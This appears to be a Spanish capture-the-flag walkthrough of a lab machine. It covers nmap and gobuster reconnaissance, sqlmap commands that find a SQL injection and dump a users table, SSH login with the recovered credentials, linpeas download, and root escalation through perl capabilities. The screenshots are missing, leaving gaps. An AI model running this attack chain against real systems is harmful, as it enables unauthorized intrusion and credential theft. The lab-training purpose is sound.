Hacemos el reconocimiento con nmap:

Y esto es lo que corre por el puerto 80:

Hacemos fuzzing y encontramos el directorio administrator y server-status:

gobuster dir -u http://192.168.0.38/ -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

En server-status no tenemos permiso para acceder:

Y esto corre en administrator:

En este punto, podemos probar si esto es vulnerable a una sql injection con sqlmap con este parámetro:

sqlmap -u http://192.168.0.38/administrator/ --forms --dbs --batch

Y tenemos estas bases de datos:

Ahora vamos a atacar a la base de datos webapp, donde si queremos ver las tablas con sqlmap, debemos usar el siguiente parámetro:

sqlmap -u http://192.168.0.38/administrator/ --forms -D Webapp --tables --batch

Y vemos la tabla users:

Ahora para ver las columnas de la tabla Users, lo haríamos de la siguiente forma:

sqlmap -u http://192.168.0.38/administrator/ --forms -D Webapp -T Users --columns --batch

Y ahora para ver todos estos registros con los usuarios y contraseñas, lo haríamos con el siguiente parámetro:

sqlmap -u http://192.168.0.38/administrator/ --forms -D Webapp -T Users -C password,id,username --dump --batch

Por tanto ahora vamos a probar en acceder por ssh con el usuario bart y contraseña b4rtp0w4:

bart:b4rtp0w4

Una vez dentro, buscamos opciones de escalar privilegios; y para ello podemos usar linpeas, pero previamente lo descargamos con este comando:

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

Lo compartimos con la máquina víctima y lo ejecutamos, donde vemos unos archivos de perl con capabilities:

Por tanto vamos a gtfobins y miramos el payload para explotar las capabilities de perl, y tenemos esto:

Por lo que podemos ejecutarlo directamente o en un script:

Y ya somos root al ejecutarlo de cualquiera de las dos formas: